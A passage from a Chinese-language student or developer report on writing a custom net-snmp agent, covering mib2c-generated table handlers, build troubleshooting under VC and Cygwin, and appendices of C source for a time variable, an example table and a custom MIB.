netsnmp_handler_registration *reginfo,

netsnmp_agent_request_info *reqinfo,

netsnmp_request_info *requests)

检索过程通过一个循环包含的两个语句：

for (request=requests; request; request=request->next) {

table_entry = (struct ExampleTable_entry *) /*检索匹配表中的行*/

netsnmp_extract_iterator_context(request);

table_info = netsnmp_extract_table_info(request); /*检索匹配表中的列*/

这样相当于通过行号和列号确定了数据。而上面的两个函数需要调用

ExampleTable_get_first_data_point;

ExampleTable_get_next_data_point;

来遍历链表。

3）数据的操纵：

数据的操纵涉及到对请求命令的响应，其代码片断如下：

switch (reqinfo->mode) {

case MODE_GET:

switch (table_info->colnum) {

case COLUMN_USERINDEX:

snmp_set_var_typed_value( request->requestvb, ASN_INTEGER,

table_entry->UserIndex,

sizeof(table_entry->UserIndex));

… … … /*对于get命令，通过snmp_set_var_typed_value*/

} /*返回变量值 */

case MODE_SET_RESERVE1: /*对于set命令，就涉及这六个步骤，这里省略了 */

case MODE_SET_RESERVE2: /*具体实现代码，我们所做的程序中，没有涉及表 */

case MODE_SET_FREE: /*中行的创建和删除，模版说明中认为，set 一个 */

case MODE_SET_ACTION: /*不存在的索引，就可以在表中为其创建一行 */

case MODE_SET_UNDO:

case MODE_SET_COMMIT:

} /*代码已合并到mib.iterator_access.conf模版中*/

关于表的set操作的流程图，如下图：

图2. SET的执行过程
3.5.2 mib.iterator_access.conf模版的实现

首先，这个模版生成了 ExampleTable.c

ExampleTable.h

ExampleTable_columns.h

ExampleTable_enums.h

ExampleTable_checkfns_local.h

ExampleTable_checkfns_local.c

ExampleTable_checkfns.h

ExampleTable_checkfns.c

ExampleTable_access.h

ExampleTable_access.c

这些文件实际上是对mib.iterator.conf模版功能的细化，提供更加完善方式的控制。只有部分需要修改，根据自定义的mib，只编辑了ExampleTable.c，ExampleTable_access.c等文件。

它提供了get_XXX（）和set_XXX（）函数来完成数据的获取和设置，需要手工实现。数据的组织不再自动生成，可以自己以其他方式实现，但仍要能关联到遍历函数上。ExampleTable_checkfns_local.c，ExampleTable_checkfns.c文件都是对set的检查操作。在主体结构和运行过程上仍和mib.iterator.conf模版一样。参见附录5.3。
3.6 代码的合并

在实现整个mib时，只需把简单变量的初始化函数和表实现的初始化函数合并。在这里简单变量的初始化函数为：void init_foxmail。把表的初始化函数void initialize_table_ExampleTable放到init_foxmail内部，再将init_foxmail作为主函数的初始化函数，修改相关头文件的引用，代码的简单合并就完成了。最后以主函数建立工程编译全部文件。
3.7 配置和运行

在主函数中，代理的初始化由三个语句顺序完成：

init_agent("example-demon"); /*运行代理名*/

init_foxmail();

init_snmp("example-demon"); /*读入的配置文件名*/

这里需要写一个名为example-demon.conf的配置文件，配置方式同介绍的snmpd.conf配置一样。然后放在安装目录~\usr\etc\snmp下。关闭防火墙，在命令提示符下运行该程序，然后用snmpget,snmpgetnext,snmptable,snmpset测试程序。
4 开发中的问题与解决

在开始拿到这个软件包时，并不知道从哪里下手，以前没接触过这么大的代码包，只是按照帮助中关于win32平台下的说明往下做，但在编译源代码包时，编译到代理程序时就进行不下去了，出现了很多全局变量的依赖错误，当时的判断是编译环境的设置问题。于是转到CygWin下，利用自带的makefile来编译整个代码，非常成功的编译并安装到CygWin中。我们试着在其中编译了几个例子以及自己写的几个程序，也成功的通过了。在例子中，提供了一个makefile文件，于是就观察其环境设置。在其gcc的编译中，用到了

CFLAGS=-I. `net-snmp-config --cflags`

BUILDLIBS=`net-snmp-config --libs`

BUILDAGENTLIBS=`net-snmp-config --agent-libs`

查找配置文件，发现这里面涉及到四个关键库（见前面环境设置章节），在VC中我都没有加上去。在VC中添加上去后，变量依赖问题大大减少，发现遗留的错误是由socket引起的。加上wsock32.lib后，在VC下就可以通过先前的程序了。

但程序运行时有碰到了问题，查不到结果，或者程序崩溃。最后我们通过检查环境设置，对比文件，发现问题出在netsnmpagent.lib这个库上。在原有的基础上重编译这个库，新编译的库比原来大了几倍，也就是说库的编译存在一个先后顺序关系，可能这个库要引用到其他库，可能VC没那么智能，需要手工设置。解决这个问题后，后面碰到的基本上是编写程序本身的错误了。
5 总结

net-snmp是一个功能很强的软件，这个开源项目仍在不断前进中。我们所做的只使用了其中的一小部分功能，主要是学习了它的一个开发流程、简单的结构框架，以及工具的使用；另外也学习了snmp协议，了解了开发包应为用户隔离底层细节，提供应用接口给用户。Net-snmp的帮助文档并不适合新手入门，它的帮助都是针对功能写的，一般通过它的开发网站中的tutorials来编译几个例子逐渐了解其功能，再回头查看帮助说明。Net-snmp项目目前放在www.sourceforge.net，可以加入net-snmp的邮件列表寻求帮助。

6 附录
6.1 主函数foxmail_new.c

/*主函数：foxmail_new.c */

#include

#include

#include

#include

#include "Display_time.h"

#include "ExampleTable.h"

static int keep_running;

RETSIGTYPE

stop_server(int a) {

keep_running = 0;

}

int

main (int argc, char **argv) {

int agentx_subagent=0; /* change this if you want to be a SNMP master agent */

int background = 0; /* change this if you want to run in the background */

int syslog = 0; /* change this if you want to use syslog */

/* print log errors to syslog or stderr */

if (syslog)

snmp_enable_calllog();

else

snmp_enable_stderrlog();

/* we're an agentx subagent? */

if (agentx_subagent) {

/* make us a agentx client. */

netsnmp_ds_set_boolean(NETSNMP_DS_APPLICATION_ID, NETSNMP_DS_AGENT_ROLE, 1);

}

/* run in background, if requested */

if (background && netsnmp_daemonize(1, !syslog))

exit(1);

/* Initialize tcpip, if necessary */

SOCK_STARTUP;

/* Initialize the agent library */

init_agent("example-demon");

/* Initialize our mib code here */

init_foxmail();

/* initialize vacm/usm access control */

if (!agentx_subagent) {

void init_vacm_vars();

void init_usmUser();

}

/* Example-demon will be used to read example-demon.conf files. */

init_snmp("example-demon");

/* If we're going to be a snmp master agent, initial the ports */

if (!agentx_subagent)

init_master_agent(); /* open the port to listen on (defaults to udp:161) */

/* In case we recevie a request to stop (kill -TERM or kill -INT) */

keep_running = 1;

signal(SIGTERM, stop_server);

signal(SIGINT, stop_server);

snmp_log(LOG_INFO,"example-demon is up and running.\n");

/* your main loop here... */

while(keep_running) {

/* if you use select(), see snmp_select_info() in snmp_api(3) */

/* --- OR --- */

agent_check_and_process(1); /* 0 == don't block */

}

/* at shutdown time */

snmp_shutdown("example-demon");

SOCK_CLEANUP;

return 0;

}
6.2 简单变量实现代码
6.2.1 display_time.c

/*display_time.c*/

#include

#include

#include

#if HAVE_STDLIB_H

#include

#endif

#if TIME_WITH_SYS_TIME

# ifdef WIN32

# include

# else

# include

# endif

# include

#else

# if HAVE_SYS_TIME_H

# include

# else

# include

# endif

#endif

#include "util_funcs.h"

#include "Display_time.h"

#include "ExampleTable.h"

struct variable2 foxmail_variables[] =

{

{FoxmailINT,ASN_INTEGER,RONLY,var_foxmail,1,{1}},

{FoxmailTIMETICKS, ASN_TIMETICKS, RONLY, var_foxmail, 1, {2}}

};

oid foxmail_variables_oid[] = { 1,3,6,1,4,1,310 };

void

init_foxmail(void)

{

REGISTER_MIB("foxmail", foxmail_variables, variable2,

foxmail_variables_oid);

initialize_table_ExampleTable();

}

u_char *

var_foxmail(struct variable *vp,

oid * name,

size_t * length,

int exact, size_t * var_len, WriteMethod ** write_method)

{

static long long_ret; /* for everything else */

static time_t timep;

struct tm *p;

time(&timep);

p=gmtime(&timep);

DEBUGMSGTL(("foxmail", "var_foxmail entered\n"));

if (header_generic(vp, name, length, exact, var_len, write_method) ==

MATCH_FAILED)

return NULL;

switch (vp->magic) {

case FoxmailINT:

long_ret=timep;

return (u_char *) & long_ret;

case FoxmailTIMETICKS:

time(&timep);

long_ret=(p->tm_wday*24*3600+(p->tm_hour+8)*3600+p->tm_min*60+p->tm_sec)*100;

return (u_char*) & long_ret;

default:

DEBUGMSGTL(("snmpd", "unknown sub-id %d in examples/var_example\n",

vp->magic));

}

return NULL;

}
6.2.2 display_time.h

/*display_time.h*/

#ifndef DISPLAY_TIME_H

#define DISPLAY_TIME_H

config_require(util_funcs)

extern void init_foxmail(void);

extern FindVarMethod var_foxmail;

#define FoxmailINT 1

#define FoxmailTIMETICKS 2

#endif
6.3 表的实现
6.3.1 ExampleTable.c

/*ExampleTable.c*/

/*

* Note: this file originally auto-generated by mib2c using

* : mib2c.iterate_access.conf,v 1.11 2004/08/31 10:23:16 dts12 Exp $

*/

#include

#include

#include

#include "ExampleTable.h"

#include "ExampleTable_checkfns.h"

#include "ExampleTable_access.h"

static netsnmp_oid_stash_node *undoStorage = NULL;

static netsnmp_oid_stash_node *commitStorage = NULL;

struct undoInfo {

void *ptr;

size_t len;

};

struct commitInfo {

void *data_context;

int have_committed;

int new_row;

};

void

ExampleTable_free_undoInfo(void *vptr) {

struct undoInfo *ui = vptr;

if (!ui)

return;

SNMP_FREE(ui->ptr);

SNMP_FREE(ui);

}

/** Initialize the ExampleTable table by defining its contents and how it's structured */

void

initialize_table_ExampleTable(void)

{

static oid ExampleTable_oid[] = {1,3,6,1,4,1,310,3};

netsnmp_table_registration_info *table_info;

netsnmp_handler_registration *my_handler;

netsnmp_iterator_info *iinfo;

/** create the table registration information structures */

table_info = SNMP_MALLOC_TYPEDEF(netsnmp_table_registration_info);

iinfo = SNMP_MALLOC_TYPEDEF(netsnmp_iterator_info);

my_handler = netsnmp_create_handler_registration("ExampleTable",

ExampleTable_handler,

ExampleTable_oid,

OID_LENGTH(ExampleTable_oid),

HANDLER_CAN_RWRITE

);

if (!my_handler || !table_info || !iinfo) {

snmp_log(LOG_ERR, "malloc failed in initialize_table_ExampleTable");

return; /** Serious error. */

}

/***************************************************

* Setting up the table's definition

*/

netsnmp_table_helper_add_indexes(table_info,

ASN_INTEGER, /** index: MachineNumber */

0);

/** Define the minimum and maximum accessible columns. This

optimizes retrival. */

table_info->min_column = 1;

table_info->max_column = 4;

/** iterator access routines */

iinfo->get_first_data_point = ExampleTable_get_first_data_point;

iinfo->get_next_data_point = ExampleTable_get_next_data_point;

/** you may wish to set these as well */

#ifdef MAYBE_USE_THESE

iinfo->make_data_context = ExampleTable_context_convert_function;

iinfo->free_data_context = ExampleTable_data_free;

/** pick *only* one of these if you use them */

iinfo->free_loop_context = ExampleTable_loop_free;

iinfo->free_loop_context_at_end = ExampleTable_loop_free;

#endif

/** tie the two structures together */

iinfo->table_reginfo = table_info;

/***************************************************

* registering the table with the master agent

*/

DEBUGMSGTL(("initialize_table_ExampleTable",

"Registering table ExampleTable as a table iterator\n"));

netsnmp_register_table_iterator(my_handler, iinfo);

}

/** Initializes the ExampleTable module */

/*void

init_ExampleTable(void)

{

*/

/** here we initialize all the tables we're planning on supporting */

/* initialize_table_ExampleTable();

}*/

/** handles requests for the ExampleTable table, if anything else needs to be done */

int

ExampleTable_handler(

netsnmp_mib_handler *handler,

netsnmp_handler_registration *reginfo,

netsnmp_agent_request_info *reqinfo,

netsnmp_request_info *requests) {

netsnmp_request_info *request;

netsnmp_table_request_info *table_info;

netsnmp_variable_list *var;

struct commitInfo *ci = NULL;

void *data_context = NULL;

oid *suffix;

size_t suffix_len;

/** column and row index encoded portion */

suffix = requests->requestvb->name + reginfo->rootoid_len + 1;

suffix_len = requests->requestvb->name_length -

(reginfo->rootoid_len + 1);

for(request = requests; request; request = request->next) {

var = request->requestvb;

if (request->processed != 0)

continue;

switch (reqinfo->mode) {

case MODE_GET:

data_context = netsnmp_extract_iterator_context(request);

if (data_context == NULL) {

netsnmp_set_request_error(reqinfo, request,

SNMP_NOSUCHINSTANCE);

continue;

}

break;

case MODE_SET_RESERVE1:

data_context = netsnmp_extract_iterator_context(request);

if (data_context == NULL) {

netsnmp_set_request_error(reqinfo, request,

SNMP_ERR_NOCREATION);

continue;

}

break;

default: /* == the other SET modes */

ci = netsnmp_oid_stash_get_data(commitStorage,

suffix+1, suffix_len-1);

break;

}

/** extracts the information about the table from the request */

table_info = netsnmp_extract_table_info(request);

/** table_info->colnum contains the column number requested */

/** table_info->indexes contains a linked list of snmp variable

bindings for the indexes of the table. Values in the list

have been set corresponding to the indexes of the

request */

if (table_info == NULL) {

continue;

}

switch(reqinfo->mode) {

case MODE_GET:

switch(table_info->colnum) {

case COLUMN_MACHINENUMBER:

{

long *retval;

size_t retval_len = 0;

retval = get_MachineNumber(data_context, &retval_len);

if (retval)

snmp_set_var_typed_value(var, ASN_INTEGER,

(const u_char *) retval,

retval_len);

}

break;

case COLUMN_MACHINESTATUS:

{

char *retval;

size_t retval_len = 0;

retval = get_MachineStatus(data_context, &retval_len);

if (retval)

snmp_set_var_typed_value(var, ASN_OCTET_STR,

(const u_char *) retval,

retval_len);

}

break;

case COLUMN_CHECKTIME:

{

u_long *retval;

size_t retval_len = 0;

retval = get_CheckTime(data_context, &retval_len);

if (retval)

snmp_set_var_typed_value(var, ASN_TIMETICKS,

(const u_char *) retval,

retval_len);

}

break;

case COLUMN_MONSET:

{

long *retval;

size_t retval_len = 0;

retval = get_MonSet(data_context, &retval_len);

if (retval)

snmp_set_var_typed_value(var, ASN_INTEGER,

(const u_char *) retval,

retval_len);

}

break;

default:

/** We shouldn't get here */

snmp_log(LOG_ERR, "problem encountered in ExampleTable_handler: unknown column\n");

}

break;

case MODE_SET_RESERVE1:

ci = netsnmp_oid_stash_get_data(commitStorage,

suffix+1, suffix_len-1);

if (!ci) {

/** create the commit storage info */

ci = SNMP_MALLOC_STRUCT(commitInfo);

if (!data_context) {

// ci->data_context = ExampleTable_create_data_context(table_info->indexes);

ci->new_row = 1;

} else {

ci->data_context = data_context;

}

netsnmp_oid_stash_add_data(&commitStorage,

suffix+1, suffix_len-1, ci);

}

break;

case MODE_SET_RESERVE2:

switch(table_info->colnum) {

case COLUMN_MONSET:

{

long *retval;

size_t retval_len = 0;

struct undoInfo *ui = NULL;

int ret;

/** first, get the old value */

retval = get_MonSet(ci->data_context, &retval_len);

if (retval) {

ui = SNMP_MALLOC_STRUCT(undoInfo);

ui->len = retval_len;

memdup((u_char **) &ui->ptr,

(u_char *) retval,

ui->len);

}

/** check the new value, possibly against the

older value for a valid state transition */

ret = check_MonSet(request->requestvb->type,

(long *) request->requestvb->val.integer,

request->requestvb->val_len,

retval, retval_len);

if (ret != 0) {

netsnmp_set_request_error(reqinfo, request,

ret);

ExampleTable_free_undoInfo(ui);

} else if (ui) {

/** remember information for undo purposes later */

netsnmp_oid_stash_add_data(&undoStorage,

suffix,

suffix_len,

ui);

}

}

break;

default:

netsnmp_set_request_error(reqinfo, request,

SNMP_ERR_NOTWRITABLE);

break;

}

break;

case MODE_SET_ACTION:

/** save a variable copy */

switch(table_info->colnum) {

case COLUMN_MONSET:

{

int ret;

ret = set_MonSet(ci->data_context,

(long *) request->requestvb->val.integer,

request->requestvb->val_len);

if (ret) {

netsnmp_set_request_error(reqinfo, request,

ret);

}

}

break;

}

break;

case MODE_SET_COMMIT:

if (!ci->have_committed) {

/** do this once per row only */

ExampleTable_commit_row(&ci->data_context, ci->new_row);

ci->have_committed = 1;

}

break;

case MODE_SET_UNDO:

/** save a variable copy */

switch(table_info->colnum) {

case COLUMN_MONSET:

{

int retval;

struct undoInfo *ui;

ui = netsnmp_oid_stash_get_data(undoStorage,

suffix,

suffix_len);

retval = set_MonSet(ci->data_context, ui->ptr,

ui->len);

if (retval) {

netsnmp_set_request_error(reqinfo, request,

SNMP_ERR_UNDOFAILED);

}

}

break;

}

break;

case MODE_SET_FREE:

break;

default:

snmp_log(LOG_ERR, "problem encountered in ExampleTable_handler: unsupported mode\n");

}

}

/** clean up after all requset processing has ended */

switch(reqinfo->mode) {

case MODE_SET_UNDO:

case MODE_SET_FREE:

case MODE_SET_COMMIT:

/** clear out the undo cache */

netsnmp_oid_stash_free(&undoStorage, ExampleTable_free_undoInfo);

netsnmp_oid_stash_free(&commitStorage, netsnmp_oid_stash_no_free);

}

return SNMP_ERR_NOERROR;

}
6.3.2 ExampleTable.h

/*ExampleTable.h*/

/*

* Note: this file originally auto-generated by mib2c using

* : mib2c.iterate_access.conf,v 1.11 2004/08/31 10:23:16 dts12 Exp $

*/

#ifndef EXAMPLETABLE_H

#define EXAMPLETABLE_H

/** other required module components */

config_require(ExampleTable_access)

config_require(ExampleTable_checkfns)

/* function declarations */

void init_ExampleTable(void);

void initialize_table_ExampleTable(void);

Netsnmp_Node_Handler ExampleTable_handler;

/* column number definitions for table ExampleTable */

#include "ExampleTable_columns.h"

/* enum definions */

#include "ExampleTable_enums.h"

#endif /** EXAMPLETABLE_H */
6.3.3 ExampleTable_access.c

/*ExampleTable_access.c*/

/*

* Note: this file originally auto-generated by mib2c using

* : mib2c.access_functions.conf,v 1.9 2004/10/14 12:57:33 dts12 Exp $

*/

#include

#include

#include

#include "ExampleTable_access.h"

#include "ExampleTable_enums.h"

#include

struct ExampleTable_entry {

long MachineNumber;

char MachineStatus[10];

u_long CheckTime;

long MonSet;

struct ExampleTable_entry *next;

};

struct ExampleTable_entry *ExampleTable_head=NULL;

/* create a new row in the (unsorted) table */

struct ExampleTable_entry *

ExampleTable_createEntry(long MachineNumber,

char *MachineStatus,

u_long CheckTime,

long MonSet

)

{

struct ExampleTable_entry *entry;

entry = SNMP_MALLOC_TYPEDEF(struct ExampleTable_entry);

if (!entry)

return NULL;

entry->MachineNumber = MachineNumber;

strcpy(entry->MachineStatus ,MachineStatus);

entry->CheckTime = CheckTime;

entry->MonSet =MonSet;

entry->next = ExampleTable_head;

ExampleTable_head = entry;

return entry;

}

/* remove a row from the table */

void

ExampleTable_removeEntry( struct ExampleTable_entry *entry )

{

struct ExampleTable_entry *ptr, *prev;

if (!entry)

return; /* Nothing to remove */

for ( ptr = ExampleTable_head, prev = NULL;

ptr != NULL;

prev = ptr, ptr = ptr->next ) {

if ( ptr == entry )

break;

}

if ( !ptr )

return; /* Can't find it */

if ( prev == NULL )

ExampleTable_head = ptr->next;

else

prev->next = ptr->next;

SNMP_FREE( entry ); /* XXX - release any other internal resources */

}

void data_read(void)

{

FILE *fp;

int i;

struct ExampleTable_entry *temp;

fp=fopen("data.txt","r");

while (ExampleTable_head)/*clean link list begin*/

{

temp=ExampleTable_head->next;

ExampleTable_removeEntry(ExampleTable_head);

ExampleTable_head=temp;

}/*clean link list end*/

temp=SNMP_MALLOC_TYPEDEF(struct ExampleTable_entry);

temp->next=NULL;

/*set up a link list begin*/

if(fp)

{

i=fscanf(fp,"%d %s %d %d",&temp->MachineNumber, temp->MachineStatus, &temp->CheckTime,&temp->MonSet);

/*fscanf return reading var numbers .if EOF return -1.feof() dosen't work well*/

while(i>0)

{

ExampleTable_createEntry(temp->MachineNumber,temp->MachineStatus,temp->CheckTime,temp->MonSet);

i=fscanf(fp,"%d %s %d %d",&temp->MachineNumber, temp->MachineStatus, &temp->CheckTime,&temp->MonSet);

}

SNMP_FREE(temp);

fclose(fp);/*set up a link list end*/

}

else

{

printf("Error:Can't open data.txt!\n");

/*exit(1);*/

}

}

static u_long long_ret;

/** returns the first data point within the ExampleTable table data.

Set the my_loop_context variable to the first data point structure

of your choice (from which you can find the next one). This could

be anything from the first node in a linked list, to an integer

pointer containing the beginning of an array variable.

Set the my_data_context variable to something to be returned to

you later that will provide you with the data to return in a given

row. This could be the same pointer as what my_loop_context is

set to, or something different.

The put_index_data variable contains a list of snmp variable

bindings, one for each index in your table. Set the values of

each appropriately according to the data matching the first row

and return the put_index_data variable at the end of the function.

*/

netsnmp_variable_list *

ExampleTable_get_first_data_point(void **my_loop_context, void **my_data_context,

netsnmp_variable_list *put_index_data,

netsnmp_iterator_info *mydata)

{

data_read();

*my_loop_context = ExampleTable_head;

*my_data_context = ExampleTable_head;

return ExampleTable_get_next_data_point(my_loop_context, my_data_context,

put_index_data, mydata );

}

/** functionally the same as ExampleTable_get_first_data_point, but

my_loop_context has already been set to a previous value and should

be updated to the next in the list. For example, if it was a

linked list, you might want to cast it to your local data type and

then return my_loop_context->next. The my_data_context pointer

should be set to something you need later and the indexes in

put_index_data updated again. */

netsnmp_variable_list *

ExampleTable_get_next_data_point(void **my_loop_context, void **my_data_context,

netsnmp_variable_list *put_index_data,

netsnmp_iterator_info *mydata)

{

struct ExampleTable_entry *entry = (struct ExampleTable_entry *)*my_loop_context;

netsnmp_variable_list *idx = put_index_data;

if ( entry )

{

snmp_set_var_value( idx, (u_char *)&entry->MachineNumber, sizeof(entry->MachineNumber) );

idx = idx->next_variable;

*my_data_context = (void *)entry;

*my_loop_context = (struct ExampleTable_entry *)entry->next;

}

else

{

return NULL;

}

return put_index_data;

}

/** Create a data_context for non-existent rows that SETs are performed on.

* return a void * pointer which will be passed to subsequent get_XXX

* and set_XXX functions for data retrival and modification during

* this SET request.

*

* The indexes are encoded (in order) into the index_data pointer,

* and the column object which triggered the row creation is available

* via the column parameter, if it would be helpful to use that information.

*/

/*

void *

ExampleTable_create_data_context(netsnmp_variable_list *index_data) {

return entry; /* XXX: you likely want to return a real pointer */

/*

}

*/

/** If the implemented set_* functions don't operate directly on the

real-live data (which is actually recommended), then this function

can be used to take a given my_data_context pointer and "commit" it

to whereever the modified data needs to be put back to. For

example, if this was a routing table you could publish the modified

routes back into the kernel at this point.

new_or_del will be set to 1 if new, or -1 if it should be deleted

or 0 if it is just a modification of an existing row.

If you free the data yourself, make sure to *my_data_context = NULL */

int

ExampleTable_commit_row(void **my_data_context, int new_or_del)

{

/** Add any necessary commit code here */

/* */

/* return no errors. And there shouldn't be any!!! Ever!!! You

should have checked the values long before this. */

return SNMP_ERR_NOERROR;

}

/* User-defined data access functions (per column) for data in table ExampleTable */

/*

* NOTE:

* - these get_ routines MUST return data that will not be freed (ie,

* use static variables or persistent data). It will be copied, if

* needed, immediately after the get_ routine has been called.

* - these SET routines must copy the incoming data and can not take

* ownership of the memory passed in by the val pointer.

*/

/** XXX: return a data pointer to the data for the MachineNumber column and set

ret_len to its proper size in bytes. */

long *get_MachineNumber(void *data_context, size_t *ret_len) {

struct ExampleTable_entry *entry=(struct ExampleTable_entry *)data_context;

long_ret=entry->MachineNumber;

*ret_len=sizeof(long_ret);

return &long_ret; /** XXX: replace this with a pointer to a real value */

}

/** XXX: return a data pointer to the data for the MachineStatus column and set

ret_len to its proper size in bytes. */

char *get_MachineStatus(void *data_context, size_t *ret_len) {

struct ExampleTable_entry *entry=(struct ExampleTable_entry *)data_context;

*ret_len=strlen(entry->MachineStatus);

return entry->MachineStatus; /** XXX: replace this with a pointer to a real value */

}

/** XXX: return a data pointer to the data for the CheckTime column and set

ret_len to its proper size in bytes. */

u_long *get_CheckTime(void *data_context, size_t *ret_len) {

struct ExampleTable_entry *entry=(struct ExampleTable_entry *)data_context;

long_ret=entry->CheckTime;

*ret_len=sizeof(long_ret);

return &long_ret; /** XXX: replace this with a pointer to a real value */

}

/** XXX: return a data pointer to the data for the MonSet column and set

ret_len to its proper size in bytes. */

long *get_MonSet(void *data_context, size_t *ret_len) {

struct ExampleTable_entry *entry=(struct ExampleTable_entry *)data_context;

long_ret=entry->MonSet;

*ret_len=sizeof(long_ret);

return &long_ret; /** XXX: replace this with a pointer to a real value */

}

/** XXX: Set the value of the MonSet column and return

SNMP_ERR_NOERROR on success

SNMP_ERR_XXX for SNMP deterministic error codes

SNMP_ERR_GENERR on generic failures (a last result response). */

int set_MonSet(void *data_context, long *val, size_t val_len) {

FILE *fp;

struct ExampleTable_entry *temp=ExampleTable_head,*entry=data_context;

memcpy(&entry->MonSet, val, val_len);

fp=fopen("data.txt","w+");

if(!fp)

{DEBUGMSGTL(("set_MonSet","Open file failure\n"));

return SNMP_ERR_NOACCESS;

}

else

while(temp)

{

fprintf(fp,"\n%d %s %d %d",temp->MachineNumber,

temp->MachineStatus,

temp->CheckTime,

temp->MonSet);

temp=temp->next;

}

fclose(fp);

return SNMP_ERR_NOERROR; /** XXX: change if an error occurs */

}

6.3.4 ExampleTable_access.h

/*ExampleTable_access.h*/

/*

* Note: this file originally auto-generated by mib2c using

* : mib2c.access_functions.conf,v 1.9 2004/10/14 12:57:33 dts12 Exp $

*/

#ifndef EXAMPLETABLE_ACCESS_H

#define EXAMPLETABLE_ACCESS_H

/** User-defined data access functions for data in table ExampleTable */

/** row level accessors */

Netsnmp_First_Data_Point ExampleTable_get_first_data_point;

Netsnmp_Next_Data_Point ExampleTable_get_next_data_point;

int ExampleTable_commit_row(void **my_data_context, int new_or_del);

void * ExampleTable_create_data_context(netsnmp_variable_list *index_data, int column);

/** column accessors */

long *get_MachineNumber(void *data_context, size_t *ret_len);

char *get_MachineStatus(void *data_context, size_t *ret_len);

u_long *get_CheckTime(void *data_context, size_t *ret_len);

long *get_MonSet(void *data_context, size_t *ret_len);

int set_MonSet(void *data_context, long *val, size_t val_len);

#endif /* EXAMPLETABLE_ACCESS_H */

6.3.5 ExampleTable_checkfns.c

/*ExampleTable_checkfns.c*/

/*

* Note: this file originally auto-generated by mib2c using

* : mib2c.check_values.conf,v 1.8 2004/01/12 00:43:45 rstory Exp $

*/

/********************************************************************

* NOTE NOTE NOTE

* This file is auto-generated and SHOULD NOT BE EDITED by hand.

* Modify the ExampleTable_checkfns_local.[ch] files insead so that you

* can regenerate this one as mib2c improvements are made.

********************************************************************/

/* standard headers */

#include

#include

#include "ExampleTable_checkfns.h"

#include "ExampleTable_checkfns_local.h"

#include "ExampleTable_enums.h"

/** Decides if an incoming value for the MonSet mib node is legal.

* @param type The incoming data type.

* @param val The value to be checked.

* @param val_len The length of data stored in val (in bytes).

* @return 0 if the incoming value is legal, an SNMP error code otherwise.

*/

int

check_MonSet(int type, long *val, size_t val_len,

long *old_val, size_t old_val_len) {

int ret;

/** Check to see that we were called legally */

if (!val)

return SNMP_ERR_GENERR;

/** Check the incoming type for correctness */

if (type != ASN_INTEGER)

return SNMP_ERR_WRONGTYPE;

ret = SNMP_ERR_NOERROR;

/** looks ok, call the local version of the same function. */

return check_MonSet_local(type, val, val_len, old_val, old_val_len);

}
6.3.6 ExampleTable_checkfns.h

/*ExampleTable_checkfns.h*/

/*

* Note: this file originally auto-generated by mib2c using

* : mib2c.iterate.conf,v 5.6 2003/02/20 00:52:07 hardaker Exp $

*/

/***********************************************************************

* This file is auto-generated and SHOULD NOT BE EDITED by hand.

* Modify the ExampleTable_checkfns_local.[ch] files insead.

* (so that you can regenerate this one as mib2c improvements are made)

***********************************************************************/

#ifndef EXAMPLETABLE_CHECKFNS_H

#define EXAMPLETABLE_CHECKFNS_H

/** make sure we load the functions that you can modify */

config_require(ExampleTable_checkfns_local)

/* these functions are designed to check incoming values for

columns in the ExampleTable table for legality with respect to

datatype and value.

*/

int check_MonSet(int type, long *val, size_t val_len, long *old_val, size_t old_val_len);

#endif /* EXAMPLETABLE_CHECKFNS_H */

6.3.7 ExampleTable_checkfns_local.c

/*ExampleTable_checkfns_local.c*/

/*

* Note: this file originally auto-generated by mib2c using

* : mib2c.check_values_local.conf,v 5.2 2004/05/04 23:34:56 hardaker Exp $

*/

/* standard headers */

#include

#include

#include "ExampleTable_checkfns.h"

#include "ExampleTable_enums.h"

/** Decides if an incoming value for the MonSet mib node is legal, from a local implementation specific viewpoint.

* @param type The incoming data type.

* @param val The value to be checked.

* @param val_len The length of data stored in val (in bytes).

* @return 0 if the incoming value is legal, an SNMP error code otherwise.

*/

int

check_MonSet_local(int type, long *val, size_t val_len, long *old_val, size_t old_val_len) {

/** XXX: you may want to check aspects of the new value that

were not covered by the automatic checks by the parent function. */

/** XXX: you make want to check that the requested change from

the old value to the new value is legal (ie, the transistion

from one value to another is legal */

/** if everything looks ok, return SNMP_ERR_NOERROR */

return SNMP_ERR_NOERROR;

}
6.3.8 ExampleTable_checkfns_local.h

/*ExampleTable_checkfns_local.h*/

/*

* Note: this file originally auto-generated by mib2c using

* : : mib2c.check_values_local.conf,v 5.2 2004/05/04 23:34:56 hardaker Exp $

*

*/

#ifndef EXAMPLETABLE_CHECKFNS_H

#define EXAMPLETABLE_CHECKFNS_H

/* these functions are designed to check incoming values for

columns in the ExampleTable table for legality with respect to

datatype and value according to local conventions. You should modify

them as appropriate. They will be called from parent check_value

functions that are auto-generated using mib2c and the parent functions

should NOT be modified.

*/

int check_MonSet_local(int type, long *val, size_t val_len, long *old_val, size_t old_val_len);

#endif /* EXAMPLETABLE_CHECKFNS_H */

6.3.9 ExampleTable_columns.h

/* ExampleTable_columns.h*/

/*

* Note: this file originally auto-generated by mib2c using

* : mib2c.column_defines.conf,v 5.1 2002/05/08 05:42:47 hardaker Exp $

*/

#ifndef EXAMPLETABLE_COLUMNS_H

#define EXAMPLETABLE_COLUMNS_H

/* column number definitions for table ExampleTable */

#define COLUMN_MACHINENUMBER 1

#define COLUMN_MACHINESTATUS 2

#define COLUMN_CHECKTIME 3

#define COLUMN_MONSET 4

#endif /* EXAMPLETABLE_COLUMNS_H */
6.3.10 ExampleTable_enums.h

/* ExampleTable_enums.h*/

/*

* Note: this file originally auto-generated by mib2c using

* : mib2c.column_enums.conf,v 5.2 2003/02/22 04:09:25 hardaker Exp $

*/

#ifndef EXAMPLETABLE_ENUMS_H

#define EXAMPLETABLE_ENUMS_H

#endif /* EXAMPLETABLE_ENUMS_H */
6.4 自定义mib文件MyMib.txt

MyMIB DEFINITIONS::=BEGIN

IMPORTS

enterprises,OBJECT-TYPE,Integer32,TimeTicks

FROM SNMPv2-SMI

TEXTUAL-CONVENTION, DisplayString FROM SNMPv2-TC;

foxmail OBJECT IDENTIFIER::={enterprises 310}

SecondCounter OBJECT-TYPE

SYNTAX Integer32

ACCESS read-write

STATUS mandatory

DESCRIPTION "This is a one minute counter from year 1970.1.1.0:0 to now"

::={foxmail 1}

WeekTime OBJECT-TYPE

SYNTAX TimeTicks

ACCESS read-only

STATUS mandatory

DESCRIPTION "Recording taday's time and the day sorts in the week"

::={foxmail 2}

ExampleTable OBJECT-TYPE

SYNTAX SEQUENCE OF ExampleEntry

MAX-ACCESS not-accessible

STATUS current

DESCRIPTION

"A list of interface entries. The number of entries is

